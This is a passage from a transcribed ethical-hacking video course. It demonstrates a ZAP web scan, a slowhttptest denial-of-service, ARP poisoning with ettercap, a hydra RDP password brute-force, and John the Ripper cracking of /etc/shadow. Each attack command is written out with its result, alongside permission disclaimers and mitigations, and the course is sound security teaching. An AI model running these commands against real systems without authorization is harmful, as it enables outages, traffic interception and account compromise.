What I want to do here is specify the URL of the web application. So here's the IP address of my BadStore
sample web app. And I'm going to tell it that we're going to use the Chrome browser capabilities, essentially to
crawl through and check everything on the site. Then I'll click Attack.
[Video description begins] He types the following text in the "URL to attack" text box: http://192.168.157.131.
He selects the "Chrome" option in the "Use ajax spider" drop-down list box. He then clicks the "Attack"
button. A tab labeled "Spider" opens in the fourth part of the window. [Video description ends]
Now we can see down below there are a number of HTTP POST and GET methods that are being tested against
a lot of the aspects of the application that are available. Here we can see in the CGI script, we've got a lot of
different things that are being tested. We can also see the overall percentage of the entire scan. So I'm going to
give it a few minutes before we go and take a look at any alerts which will tell us that we've got some
vulnerabilities in our web application. Okay, so now that the scan is completed, if we go to the Alerts tab, we
have some issues here: Cross Site Scripting, specifically Reflected. An XSS type of attack apparently is possible.
[Video description begins] The "Alerts" tab is divided into two sections: navigation pane and content pane.
The navigation pane includes an Alerts root node, which further includes a Cross Site Scripting (Reflected)
subnode, which further includes a file called: POST: http://192.168.157.131/cgi-bin/badstore.cgi?
action=moduser. He clicks the aforementioned file and it opens in the content pane of the Alerts tab. [Video
description ends]
So if we click, we can see that an HTTP POST was supplied to the application. We can see it was a CGI script.
We can also see the action here is to mod user, to modify user. Okay, so that must be the functionality in that
web application to change something about a user account. And over on the right, we can see that that is a
High Risk.
[Video description begins] He points to the contents of the aforementioned file. [Video description ends]
As we go further down, we can see actually the attack that looks like it might have been sent, which was some
JavaScript that was placed inside a location that otherwise shouldn't have allowed that to happen. And we can
see a solution listed here to use better code libraries, maybe to properly encode output using Microsoft's
Anti-Cross-Site Scripting Library or the OWASP ESAPI, the Enterprise Security API. So there are some
solutions that are recommended here. There are some SQL injection issues. If we take a look here, we can even
see how this attack was actually sent and that results were sent back.
[Video description begins] The Alerts root node also includes a SQL Injection subnode, which further includes
a file called: POST: http://192.168.157.131/cgi-bin/badstore.cgi?action=cartadd. He clicks the
aforementioned file and it opens in the content pane of the Alerts tab. He then points to the contents of the
aforementioned file. [Video description ends]
So essentially 1=1 is always true, and if not properly validated, that could allow the disclosure of sensitive
information from the web app. So again, as we go down, we can see that there are some solutions listed here
with reference points as well. If we scroll down, we have a lot of other issues. For example, let's go into
Directory Browsing. So it looks like, let's see here, there's a listing here for a supplier subdirectory on the web
site. So directory browsing is enabled or allowed there.
[Video description begins] The Alerts root node also includes a "Directory Browsing" subnode, which further
includes a file called: POST: http://192.168.157.131/supplier/. He clicks the aforementioned file and it opens
in the content pane of the Alerts tab. He then points to the contents of the aforementioned file. [Video
description ends]
Let's actually check that out for a second. So yeah, sure enough, if I enter in /supplier/ after the IP address on
that web app, I get a listing.
[Video description begins] He switches to a browser window and opens the following URL:
192.168.157.131/supplier/. The following web page opens: Index of /supplier. It includes a table with four
columns and two rows. The column headers include "Name" and "Last modified". The second row entry
includes: Name: accounts. [Video description ends]
And I can see here we've got accounts. And if I click that, this is probably something that not just anybody
should be able to see without signing in to that web application. So yes, it looks like there are a lot of
vulnerabilities in this web app.
[Video description begins] The following web page opens: 192.168.157.131/supplier/accounts. [Video
description ends]
So as a cybersecurity analyst, we have to make sure that this is conveyed to the appropriate teams, such as a
developer team manager. And when doing that, we might want to go to the Report menu here in the OWASP
ZAP tool and generate an HTML report. So let's just go ahead and specify one here, call it BadApp, and
we'll just save it.
[Video description begins] He switches back to the OWASP ZAP 2.9.0 window. He clicks "Report" in the menu
bar and clicks the "Generate HTML Report" option from the menu. A dialog box called "Save" opens. [Video
description ends]
And that generates an HTML report here. Where we can see a summary at the top of the risks and then a
breakdown of the specific risks and exactly what was tested against the application.
[Video description begins] The following html page opens in the browser: ZAP Scanning Report. [Video
description ends]
So this might be something that we want to hand off to the team leader for the developers and get them to start
taking a look at how to solidify this web application.
use the slowhttptest command to run a DoS attack against an HTTP web site
[Video description begins] Topic title: DoS Attacks. The presenter is Dan Lachance . [Video description ends]
A denial-of-service, or DoS, attack is one that renders a service unavailable.
[Video description begins] The Badstore.NET website is open. [Video description ends]
So in the case of a web application here, we can see if I keep clicking the Refresh button, it's loading up and
the page is good, the web app is running. But a denial-of-service attack would not allow people to make a
connection, in this case to a web application, but it could be any type of service. Now maybe the malicious
user floods the network with useless traffic, so legitimate traffic doesn't get a chance to get through. Perhaps a
malicious user sends specifically crafted traffic to the server that causes it to crash by taking advantage of a
vulnerability. Or if you have physical access to a server, you could always unplug the network cable, that
would also be considered a denial-of-service attack. Here on my Linux host, I'm going to start by making sure
I've got a tool that will allow me to test by sending a bunch of incomplete HTTP requests. It will
allow me to test a service's resiliency to this type of denial-of-service attack.
[Video description begins] He opens the following window: dlachance@kali:~. The following prompt is
displayed: dlachance@kali:~$. [Video description ends]
So I'm going to run the sudo Linux prefix command, to run something in elevated privilege mode. And what I
want to do is run apt-get install and the tool I'm interested in is a free one called slowhttptest. So it's slow
enough that it won't trigger a lot of intrusion detection systems with abnormal traffic spikes. But at
the same time we can also control the rate that we are sending incomplete HTTP requests to the web app to test
its resiliency. So I'm going to go ahead and press Enter.
[Video description begins] He executes the following command: sudo apt-get install slowhttptest. The screen
prompts for the password for dlachance. [Video description ends]
It wants my password, so I'm going to go ahead and enter that, and it looks like it's already at the newest
version. There are no updates, so we have the tool; we are good to go.
[Video description begins] He enters the password and the output displays that slowhttptest is already the
newest version. The prompt does not change. [Video description ends]
So what I have to do then is use the command with the appropriate command line parameters.
[Video description begins] He executes the clear command. [Video description ends]
So I'm going to run slowhttptest -c, which is the number of connections. How about we start off with 500
connections, and -g. A lowercase -g means to generate CSV and HTML report files. I'm then going to
specify the type of request to issue, an HTTP GET. Then I'll use -u, the u is for the URL, so I've pasted in the
URL of that web app, and then -H to send unfinished HTTP requests to the server. Let's go ahead and press Enter
to see what happens. At the same time, we can currently see that the service is available; the web app itself is
available. At some point, if the server is susceptible to this type of attack, it will stop responding, and we can
already see it just changed: service available currently says NO.
[Video description begins] He executes the following command: slowhttptest -c 500 -g -t GET -u
http://192.168.157.131/ -H. The output displays that the service is not available. He switches back to the
Badstore.NET website. [Video description ends]
Back here in my web browser, I've refreshed the page, we can see it's trying to refresh but it's just not loading
it up. So a legitimate user, such as myself, for example, is unable to make a connection, hence denial-of-
service. Now naturally, if you're testing this type of tool, you want to make sure you do not test it against a
real site that you don't have express written permission to run this type of test against. Otherwise, you could
be getting yourself into a pot of hot water; you can get into a lot of trouble by doing this. And back here in Linux, we
can see that the site is still unavailable.
[Video description begins] He switches back to the following window: dlachance@kali:~. He points to the
output. [Video description ends]
So what can you do about this? Well, one of the things you should consider doing to mitigate this type of slow
HTTP denial-of-service attack is to set connection timeouts on the server. But that is a very fine-tuned
balancing act because you don't want to set the connection timeout such that it will cause problems for
legitimate users. You might also want to make sure you configure HTTP header limits on your web server stack,
so that the server will only accept the very specific types of HTTP header details that are needed by your
application. But the problem is that there will always be a trade-off between limiting slow HTTP attack
effectiveness and affecting legitimate users that are connected. Of course, you can always mitigate this with
intrusion detection and prevention systems, IDSs and IPSs, that are configured to identify anomalies with HTTP
requests, such as numerous incomplete requests coming from the same IP address. Now on that Linux host in the
GUI, I've navigated to my current
home directory where the HTML report has been saved.
[Video description begins] He switches to the following html page in a browser: /home/dlachance/slow_2020-
03-02_09-58-18.html. It includes a graph labeled: Test results against http://192.168.157.131/. He points to
the aforementioned graph. [Video description ends]
So here we can see service availability is listed here in green. In the beginning of the test, the service was
available. But as our denial-of-service attack progressed, we could see that the service availability diminished
to nothing so that real legitimate requests were no longer able to reach the web application.
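Circling back to the connection-timeout and header-limit mitigations mentioned above, here is a minimal sketch for a Debian-style Apache stack; the timeout values are illustrative and would need tuning so legitimate slow clients aren't cut off.
# Enable mod_reqtimeout and require request headers within 20-40 seconds at a minimum data rate.
sudo a2enmod reqtimeout
echo 'RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500' | sudo tee /etc/apache2/conf-available/slowhttp.conf
sudo a2enconf slowhttp
sudo systemctl reload apache2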
After completing this video, you will be able to describe ARP poisoning attacks.
Objectives
[Video description begins] Topic title: ARP Poisoning. The presenter is Dan Lachance . [Video description
ends]
The Address Resolution Protocol, otherwise called ARP, maps to Layer 2 of the OSI model, the data-link layer.
[Video description begins] ARP Functionality. A diagram is displayed. [Video description ends]
The way that ARP works is that it is used by machines running TCP/IP to learn the MAC address of
another host on a local area network, so they can communicate using that MAC address on the LAN.
Ultimately, of course at the software level, the IP address is what is used to make the communication link, but
under that, it's the MAC address. So in our diagram, we've got a machine configured with a default gateway on
the left of 192.168.4.1. Now that's an IPv4 address. In order for that computer to actually communicate with
the machine with that IP address, the computer needs to know the underlying hardware address of that device,
the MAC address. And so we can see that the machine will then send out a broadcast that essentially says, who
is configured with an IP of 192.168.4.1? I need your MAC address. That's a local area network broadcast.
Now the router on the network that is configured with that IP, 192.168.4.1, is going to see the broadcast. And
it's going to reply with its hardware MAC address, which we see here is listed as beginning with 18 and ending
with 32. That in turn will be written into the ARP cache in memory on the machine, the computer that initially
sent out the ARP request. So there will be a mapping then between the IP address and the related hardware
address. Now this is only on a local area network. When you need to communicate with the machine outside of
your local area network, on the other side of the router, you don't look for its MAC address. You would only be
interested in the MAC address of the next hop, which would be your router's MAC address for the interface
on your side of the network. So all of this happens only on a local area network.
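For reference, on a Linux host you can inspect the same kind of IP-to-MAC mappings that we'll look at on Windows with arp -a; these are standard commands, shown here just for comparison.
ip neigh show    # modern iproute2 view of the neighbor (ARP) cache
arp -n           # older net-tools equivalent, similar to arp -a on Windows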
[Video description begins] ARP Cache Poisoning (MiTM attack). A diagram is displayed. [Video description
ends]
Now, ARP cache poisoning, this is a type of man in the middle, or MiTM attack. On the left, we've got the
victim station, and on the far right, we've got an actual router that the victim would use to, for example, get out
to the Internet. And that router in this example has an IP address of 192.168.4.1. And it's got a MAC address
beginning with 18 and ending with 32. So ideally under normal legitimate circumstances, the ARP cache on
the victim station should map the router's IP address to its MAC address. But where ARP cache poisoning
kicks in is when a malicious user somehow gains access to the network, so their device can be on the network. That's
the attacker station pictured in the center of our diagram. Now, let's say it's got a MAC address beginning with
00 and ending with ED. It's a hexadecimal 48-bit address. And let's say that they've got IP forwarding enabled,
the attacker station. So what happens with an ARP cache poisoning attack is that the attacker will tell the
victim station that the MAC address for the router entry in its ARP cache is the MAC address of the attacker
station. Now, what does this mean? It means that when the victim wants to go out on the Internet through the
router, the traffic is first going to go through the attacker station. So the attacker station sees all of this traffic
that it normally wouldn't. And the attacker could run tools like Wireshark, or whatever the case might be, to
analyze that traffic.
[Video description begins] ARP Cache Poisoning: Mitigation. [Video description ends]
So what can be done about this? How can we mitigate ARP cache poisoning? The first is using intrusion
detection systems and intrusion prevention systems to detect rogue devices that perhaps should not be on the
network and of course, limiting network access in the first place using network access control.
[Video description begins] Intrusion Detection Systems abbreviates to IDS. Intrusion Prevention Systems
abbreviates to IPS. [Video description ends]
So being very strict about who can make a connection to the network, whether it's wired or wireless, in the first
place.
[Video description begins] Limit network access abbreviates to NAC. [Video description ends]
Now, there's also the option of using the Get-NetIPInterface PowerShell cmdlet and then taking note of the
index number of a network interface.
[Video description begins] ARP Cache Poisoning: PowerShell Mitigation. A code snippet is displayed. The
code reads, code starts: Get-NetIPInterface New-NetNeighbor -Interfaceindex <value> -IPaddress
<router/server IP> -LinkLayerAddress <router/server MAC>. Code ends. [Video description ends]
And then using the New-NetNeighbor PowerShell cmdlet, specifying that interface index with an IP address
and a link layer address. Now that's the MAC address. What we're doing here is we're adding a static ARP
cache entry. Normally, ARP cache entries are dynamic.
[Video description begins] ARP -a. A code snippet of the output of the ARP -a command is displayed. The
output displays a table containing a list of internet addresses, their physical address, and their type. [Video
description ends]
However, once you've run those commands, if you were to run ARP -a from a regular Windows command
prompt, you would see, for example, as in our case, the IP address of the default gateway, the true physical
hardware or MAC address of the default gateway and the type would be static. Now, if you don't manually add
this entry to the ARP cache, it will show up here as dynamic, since it's learned dynamically over the network.
And that's one of the problems that leads to ARP cache poisoning.
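On a Linux host, a comparable static entry could be added with iproute2; this is just a sketch using the sample gateway IP and MAC from the diagram, and eth0 is an assumed interface name.
# Pin the gateway's MAC address so it can't be overwritten by a spoofed ARP reply.
sudo ip neigh replace 192.168.4.1 lladdr 18:90:88:a0:36:32 dev eth0 nud permanent
# Verify the entry now shows as PERMANENT rather than REACHABLE or STALE.
ip neigh show | grep 192.168.4.1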
In this video, learn how to use Kali Linux to execute an ARP poisoning man-in-the-middle attack.
Objectives
ARP stands for Address Resolution Protocol. This is used on a local area network, so devices can resolve an IP
address that they're trying to communicate with on the LAN to its underlying hardware address, otherwise
called the physical address or the MAC address. The problem is that there are ways to poison the ARP cache of
a device so that the IP address of the machine it wants to talk to stays the same, but the MAC address is
spoofed to be the attacker station's. That way, all the traffic goes through the attacker's station, so the attacker
can then examine all the traffic and so on.
[Video description begins] The command prompt window is open. The following prompt is displayed: C:\
>. [Video description ends]
So here on Windows 10, let's run arp -a and I'll pipe that to more to pause after the first screenful.
[Video description begins] He executes the following command: arp -a | more. The output displays the ARP
cache tables for all interfaces. The prompt does not change. [Video description ends]
So for my network interface adapter with an index value of two, I can see I've got the IP address of my default
gateway or my router. Here it's listed as 192.168.4.1. And through address resolution protocol or ARP, my
machine knows the physical hardware address of the router which it needs to communicate with it on the local
area network. Okay, so far so good, we're happy with that. I'll press Q to quit and let's flip over to Linux. Here
in Kali Linux, I'm going to use the cat command to go into /proc/sys/net/ipv4.
[Video description begins] He switches to the following window: dlachance@kali:~. The following prompt is
displayed: dlachance@kali:~$. [Video description ends]
Now what I'm interested in looking at is the ip_forward file. It contains a value of 1 which means IP
forwarding or routing is turned on.
[Video description begins] He executes the following command: cat /proc/sys/net/ipv4/ip_forward. The prompt
does not change and the output reads: 1. [Video description ends]
If it weren't, it would be set to 0. And I would have to go ahead and make a change to that using a text editor
and then restart the network services. Now at this point, what this means is that any traffic I might intercept
through a man-in-the-middle, or MITM, type of attack using ARP cache poisoning, let's say traffic that I get on
this machine from the Windows 10 client, will be sent out to the internet through the router because I'm routing,
and vice versa.
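If ip_forward had been 0, a quick way to flip it on without hand-editing files would be something like the following; the sysctl change shown here is not persistent across reboots.
sudo sysctl -w net.ipv4.ip_forward=1                 # enable routing immediately
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward      # equivalent, writing the proc file directly
# To persist it, the line net.ipv4.ip_forward = 1 would go into /etc/sysctl.conf or a drop-in file.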
[Video description begins] He executes the following command: sudo ifconfig. The output displays the network
interfaces of the system. The prompt does not change. [Video description ends]
So at this point, what I'm going to do is just run a sudo space ifconfig so we can check out the IP of this host,
192.168.4.52, and its Ethernet or hardware address. Notice it ends with 10:ed.
[Video description begins] He points to the following ethernet address in the output:
00:0c:29:d4:10:ed. [Video description ends]
Okay, having done that, I'm going to run ettercap -G, I'll have to put a sudo in front of that.
[Video description begins] He executes the following command: sudo ettercap -G. The Ettercap window
opens. It includes a Setup section, a button with three dots, a "Hosts List" button, and a tick icon. He clicks the
tick icon. [Video description ends]
And here, it started the Ettercap interface. Now, this tool is simply a tool that will let me scan the network for
hosts and select the ones I want to attack and then initiate an attack like an ARP poisoning attack. So I'm okay
with all the default settings here. So I'm just going to click the check mark and it says it's starting it up. Now
I'm going to click the three dots button over on the right, going to choose Hosts and Scan for hosts. I want it to
scan for hosts on the local area network that this Kali Linux station is connected to. Now once that happens,
we'll be able to select the machines that we want to target with our poisoning. In this case, it's going to be a
Windows 10 client and our router. So I can click this button in the upper-left to reveal the hosts it detected on
the network.
[Video description begins] He clicks the "Hosts List" button and a Host List tab opens. It includes a table with
three columns and several rows. The column headers are: IP address, MAC address, and Description. [Video
description ends]
I can see one of them here is my default gateway and there's the MAC address of it.
[Video description begins] He points to the first row entry which includes: IP Address: 192.168.4.1 and MAC
Address: 18:90:88:A0:36:32. [Video description ends]
Now the other one we have to determine what the IP address and MAC address are for our Windows 10
station. So back here in Windows 10. Let's just clear the screen and do an ipconfig.
[Video description begins] He executes the cls command. The prompt does not change. He executes the
following command: ipconfig. The output displays the system details including the ip address. The prompt
does not change. [Video description ends]
And I can see for my WiFi adapter, 192.168.4.24 is the IP for that Windows 10 host.
[Video description begins] He switches back to the Ettercap window. [Video description ends]
Okay, so I now know the identity of the default gateway and the Windows 10 station. These are the two
devices that I want to add as targets here for ARP spoofing.
[Video description begins] He points to the first row entry. He then points to the sixth row entry which
includes: IP Address: 192.168.4.24 and MAC Address: 18:56:80:C3:68:BA. [Video description ends]
So I'm going to select the first one, let's say our default gateway. And I'm going to go ahead and click the
Ettercap Menu, the three dots, going to choose Targets. And I'm going to select the targets. Now here I could
specify the details in this interface to specify the targets or I have the option also of just right-clicking in the
list of discovered hosts.
[Video description begins] The following pop-up box opens: Enter Targets. He then closes the pop-up
box. [Video description ends]
So I'm going to right-click on the first one, say Add to Target 1, and says down below, it's added it to target 1.
Then we've got .24, that's the Windows 10 host. So I'm going to right-click, add that to target 2. Okay, well
that's pretty easy. Now, we have to start the attack. So I can click the globe icon at the top and notice that there
are different types of attacks available here in Ettercap. Now, as always, you want to make sure that you're
doing this only against hosts that you own or that you have express written permission to perform the attack
against. I'm simply going to choose ARP poisoning, looks good.
[Video description begins] The following pop-up box opens: MITM Attack: ARP Poisoning. It includes a
button labeled "OK". [Video description ends]
Okay, and it's on its way, it's ARP Poisoning the victims. Let's see what that actually looks like.
[Video description begins] He switches to the command prompt window. The following prompt is displayed:
C:\>. [Video description ends]
So here in Windows 10, if I were to run arp -a again to display the arp cache, pipe it to more.
[Video description begins] He executes the following command: arp -a | more. The output displays the ARP
cache tables for all interfaces. The prompt does not change. [Video description ends]
We can see the IP address of our default gateway 192.168.4.1. But what's changed is the MAC address. This is
a result of the ARP cache poisoning attack. This is the MAC address of the Kali Linux attacker station. Notice
it ends with 10-ed. What that means is anything that this Windows 10 client does, let's say to go to the internet,
is first going to go through the attacker station. Because IP forwarding is enabled on the attacker station, it's
still going to get out to the internet and responses are going to come back, so it's virtually undetectable. The only
difference is that the attacker now has all the traffic funneling through that machine from this host. And so it
could easily be analyzed and tracked using different tools like Wireshark, and so on. Now what can be done
about this? Well, making sure that only allowed devices are connected to the network is one step.
In other words, maybe using network access control to authenticate devices before they're allowed on the
network in the first place. Turning off unused network jacks that connect to switch ports in the end is going to
be another important thing that could be done. Or notice that the type here is set to dynamic. You can use
PowerShell, for example, to add a static entry to the ARP cache; you are manually hard-wiring it. That would
be another option, of course we want to make sure that individual stations like Windows 10 machines are
protected as well. And we want to make sure that users aren't clicking on things they shouldn't click on, and so
on, to infect their machines, which could also change MAC addresses and so on.
After completing this video, you will be able to recognize how malicious users use a variety of password
attacks to compromise user accounts.
Objectives
recognize how malicious users use a variety of password attacks to compromise user accounts
[Video description begins] Topic title: Password Attacks. The presenter is Dan Lachance . [Video description
ends]
Usernames and passwords by far still constitute the most common type of user authentication. Two-factor
authentication has come a long way, such as sending a PIN to a user's smartphone as an SMS text message. So
you have to have the username, the password, and the phone to get the PIN. However, password attacks are
still prevalent and need to be protected against. Now there are brute force and dictionary attacks. And then
there are rainbow table attacks. All of which can compromise user account passwords, potentially. Brute force
and dictionary attacks are automated.
You're not going to have a malicious user manually trying passwords, at least not for too long, when there are
so many freely available tools that can automate that and make it happen very, very quickly. So essentially,
with a brute force and dictionary attack, we have automated tools that try many different username and
password combinations. Now how do they know which usernames and passwords to try? Well, there are word
list variations from various dictionary files that you can download from the Internet, such as word lists with
medical terms, or legal terms, or common events in history, common landmarks around the world, anything
that people might choose to use for a password. Now, rainbow tables essentially are precomputed password
hashes.
A hash is a unique value that results when you take some data, like a password, feed it into a hashing
algorithm. Think of a hashing algorithm as a one-way mathematical formula that results in a unique item, and
it can't be reverse-engineered. So what we have with rainbow tables are large collections of precomputed
password hashes. Now given access to a hashed password, attackers can compare them. Now, if you think
about a hashed password, some systems store user passwords, not in clear text, of course, hopefully, but rather
as a hash value. If you know the hashing algorithm that was used to generate that value, then you can take a
password you know, run it through the same hash, and compare the results. If you get the same thing, you know the
password. Now lookup tables for password hashes are prevalent all over the place.
[Video description begins] A screenshot of the following web page is displayed: CrackStation. It includes a
table with three column headers: Hash, Type, and Result. There is one row entry. [Video description ends]
Here's an example, CrackStation.net, where you can enter a hash value and it will tell you the actual text string,
as we see down in the bottom-right here. So we've got a large hash value that I've pasted into a field. It knows
that the type of hashing was sha256. So SHA stands for Secure Hashing Algorithm, we see that in the bottom-
right. And I can see the resultant password, @lph4. Now notice it says, Enter up to 20 non-salted hashes. What's
salting?
Salting is a concept and a technique used to secure password hashes by adding additional values that aren't
actually part of the password. And that can throw off tools like this, like lookup tables for password hashing.
You also have rainbow tables. Now rainbow tables also store hashed information that you use to compare
against hashes to try to figure out what passwords have been used. Now MD5, or Message Digest 5, is another
common hashing algorithm. But it's older and it's not nearly as secure as SHA256. So MD5 password hashes,
even up to eight characters long, have been proven to be crackable easily in seconds using commonly available
tools. Now rainbow tables are similar to lookup tables. But what makes them different is that the full
precomputed hash isn't stored for every possible password variation, so they use less space than a lookup table.
Let's say we've got a lot of precomputed hashes that start with the same prefix, in this example, f3aa5600b.
Well, instead of storing that prefix over and over, it stores it only once. It's kind of like how compression
algorithms store a single reference to a repeated item in a file to end up using less space. So while a rainbow
table ends up taking less space, it's a little bit slower to look something up than a lookup table because of this.
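To tie the hashing and salting ideas together, here's a tiny illustrative sketch using the @lph4 password from the CrackStation example; the exact salting scheme real systems use differs, but the effect on precomputed tables is the same.
echo -n '@lph4' | sha256sum                # unsalted: every system storing this password produces the same hash
salt=$(openssl rand -hex 8)                # a random per-user salt
echo -n "${salt}@lph4" | sha256sum         # salted: the stored hash no longer matches any precomputed table entry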
[Video description begins] Rainbow Tables - Free Downloads. A screenshot of the following website is open:
https://freerainbowtables.com. [Video description ends]
Now there are plenty of free downloads for rainbow tables, as seen here at the freerainbowtables.com web site.
Now you can download these, and notice that they are in the gigabytes, these are big files. And specifically,
these ones as listed at the top of the web page are designed for use with a specific cracking tool, so the
RainbowCrack improved tool, multi-threaded. Even aside from dealing with password hashes, you can refer to
default password lists all over the Internet.
[Video description begins] A screenshot of a table is displayed. The table contains six columns and several
rows. [Video description ends]
Where you can get a vendor, a specific model, a firmware version number. And then the access type, whether
it's telnet access, SNMP, or HTTPS, whatever it is. And you get a default username and password. And this is
one of the reasons why it's so crucial that we not stay with default configurations. Because they're widely
available to anyone that cares to look them up. Finally, password managers have become more and more
popular. Because it's become very cumbersome to remember passwords for a multitude of different web sites
and services out on the Internet. So a password manager is an app that you can run on any type of device that
centrally and securely stores multiple passwords. So it's great because it combines security with convenience.
Now a password or a passphrase is needed to unlock the password manager app, so you need to make sure
you make it complex. Otherwise, if a malicious user managed to get into your password manager, well,
that's the holy grail. They would have access to all of your passwords for all of your apps. So password
managers are important, but you need to make sure you harden your device. Have a personal firewall installed,
up-to-date antivirus scanner. Don't click on links or file attachments in e-mails. Or if you're going to do it, be
very, very judicious about what you accept as being legitimate.
In this video, learn how to use the hydra tool to brute force a Windows RDP connection.
Objectives
[Video description begins] Topic title: Hydra Password Attack. The presenter is Dan Lachance . [Video
description ends]
RDP, the Remote Desktop Protocol, uses port 3389 to allow remote GUI management of Windows hosts. Now
there are a lot of vulnerabilities associated with this, and the one that we're going to focus on using the Hydra
tool is simply brute forcing passwords. So the last thing you want to do is expose port 3389 directly to the
Internet for all of your hosts that are running Windows that you want remotely managed. So to get started here,
we should really mention the standard disclaimer: do not use these tools against systems that you don't own,
or that you don't have express written permission to attack. Otherwise, you could be doing something that is
illegal.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: dlachance@kali:~$. [Video description ends]
So to get started here, I'm using Kali Linux, where the Hydra tool is already built in and available. So I'm going
to type in hydra -l and I'm going to use the administrator default Windows account. And I'm going to use -P,
capital P, to specify a file that might contain passwords. Now actually, let's back up here. I'm going to change
directory to /usr/share/wordlists, that is, Unix shared resources, share, and wordlists.
In this folder, if I do an ls, we can see I've got a file called rockyou.txt. Now that file, if I were to cat it, is just a
very large file that contains all kinds of different types of passwords.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. He executes the following command: ls. The output displays the content of the directory. The
prompt does not change. [Video description ends]
So what I'm going to do is instruct the Hydra tool, with the -P parameter, to point to this file, and it's going to
try all of these passwords along with the administrator login name that I'm going to pass on the command
line.
[Video description begins] He executes the following command: cat rockyou.txt. The output displays the
contents of the rockyou.txt file. The prompt does not change. [Video description ends]
So as you can see, there are a lot of entries in there. I'll press Ctrl+C to stop that. Let's do this again: hydra -l,
the login is administrator, -P, we'll use the rockyou.txt file, and I want to connect to the RDP port on a host and I'll
specify a host here.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. [Video description ends]
Now I'm doing all this manually, of course there are ways to script this and automate it. I'm just going to pop in
the IP here of a server I know that is visible and that is running RDP.
[Video description begins] He executes the following command: hydra -l administrator -P rockyou.txt
rdp://18.205.159.117. The output displays that the target is successfully completed. The prompt does not
change. [Video description ends]
And we can see it is actually attacking that server on Port 3389. And we can see it has found that the
administrator login was successfully used in conjunction with this password shown here to connect over RDP
to that host. So we now have a username and password. We know the identity of the host. From a malicious
user standpoint, they now have a way in. So what do you do to mitigate this? Well, one of the things
that you shouldn't be doing is exposing all of your servers directly to the Internet for RDP. You
might want to make sure that's only available internally and requires VPN authentication before RDP's even an
option on the inside.
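As a quick follow-up check, and only against systems you're authorized to scan, something like this nmap probe against the lab host used above would confirm whether RDP is still exposed:
nmap -p 3389 18.205.159.117    # an 'open' state on 3389 means RDP is still reachable from this network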
[Video description begins] Topic title: John the Ripper. The presenter is Dan Lachance . [Video description
ends]
John the Ripper is a tool that's been around for a while that allows the cracking of user passwords in a variety
of different ways. You could crack a password for example that might have been applied to a zip archive file.
Or you might be able to crack a password based on a password hash stored in a Linux system, which is exactly
what we're going to do.
[Video description begins] The following window is open: dlachance@kali:/. The following prompt is
displayed: root@kali:~#. [Video description ends]
So I'm using Kali Linux and I'm connected here as user root. And what I'm going to do for starters is add a new
user account here in Linux using the useradd command. I'm going to create a user called cblackwell.
[Video description begins] He executes the following command: useradd cblackwell. No output returns and
the prompt does not change. [Video description ends]
And I'm going to use the password command, passwd, to set a password for user cblackwell. I'll type in the password
and confirm it, and it's done. It says the password was updated successfully. Now note, if you're not logged in as user root,
you might need to prefix all of these commands with the sudo command to run them in elevated privileged
mode.
[Video description begins] He executes the following command: passwd cblackwell. The screen prompts for
the new password. The output displays that the password has been updated successfully. The prompt does not
change. [Video description ends]
Now if I were to, let's say, run the tail command, it shows the last few lines of a text file. Let's start by doing a
tail of /etc/passwd.
[Video description begins] He executes the following command: tail /etc/passwd. The output displays a list of
the system's accounts. The prompt does not change. [Video description ends]
We can see we've got user cblackwell listed here. So that account has been created, but there's no password
reference here because the password by default is stored in /etc/shadow. And we can see here that we've got
user cblackwell and a hash for that person's password.
[Video description begins] He executes the following command: tail /etc/shadow. The output displays a list of
the system's accounts. The prompt does not change. [Video description ends]
And that's what we're interested in trying to crack. In this particular case using John the Ripper. John the
Ripper includes a command called unshadow where you can put together some credential files. You essentially
lump them into a single file that you use for the attack. So of course, never do this on a system that you don't
own or a system that you don't have express permission to use for this purpose. But here it's a system I own,
so there's no danger. So I'm going to use unshadow. I'm going to specify that I want to lump together the
/etc/passwd file and /etc/shadow. And let's say we'll output that, using the output redirection symbol, the
greater-than sign, to a file called creds.txt. Okay, so now let's cat the creds.txt file.
[Video description begins] He executes the following command: unshadow /etc/passwd /etc/shadow >
creds.txt. No output returns and the prompt does not change. [Video description ends]
All right, looks like we've got the contents here including, of course the password hash information.
[Video description begins] He executes the following command: cat creds.txt. The output displays the content
of the creds.txt file. The prompt does not change. [Video description ends]
So looking good, so I'll clear the screen with the clear command. Now what I'm going to do is run the john
command, and I'm simply going to specify the name of the file the creds.txt file. And I'm going to press Enter,
and let it start doing its thing.
[Video description begins] He executes the following command: john creds.txt. The output displays the
password for the user cblackwell. The prompt does not change. [Video description ends]
And it doesn't take too long for it to determine that the password for user cblackwell is green. So I'm going to
go ahead and press Ctrl+C. Now you can also, and I'll just clear the screen first, run the john command with
--show after the fact, specifying the file, in this case creds.txt, to get a listing of all the passwords that it
managed to figure out. Here we just have one password hash that was cracked. In this case, it's the password for user
cblackwell.
[Video description begins] He executes the following command: john --show creds.txt. The output displays
that 1 password has been cracked. The prompt does not change. [Video description ends]
So we want to make sure that we limit access to a host in the first place. Naturally, this only succeeded because
I had access to some sensitive files on this host.
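As a small related check, and since this attack depended on being able to read the shadow file, it's worth confirming its permissions; on most Linux systems, typical hardened output shows root ownership and no read access for others.
ls -l /etc/shadow
stat -c '%A %U %G %n' /etc/shadow    # for example, -rw-r----- root shadow /etc/shadow on Debian-based systems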
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course we've examined the execution of various types of malicious attacks, as well as some available
tools used as countermeasures to these attacks. We did this by exploring how reconnaissance is used to gather
information for hacking. How the Metasploit framework is used to generate e-mail lists. We talked about WiFi
vulnerabilities and attack techniques and tools to counter these attacks. We looked at injection, overflow, and
cross-site scripting attacks. We talked about XML attacks, common web application vulnerabilities, and the
OWASP ZAP tool. We looked at the slowhttptest command, and how session attacks are executed. We looked
at password attacks and the use of the Hydra password attack tool. And finally, we looked at how to crack user
passwords with the John the Ripper tool. In our next course, we'll move on to explore how to protect users from
divulging sensitive information through social engineering scams, as well as protecting assets from various
types of malware.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The host for this session is Dan Lachance. He is an
IT Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held, and still hold, IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting,
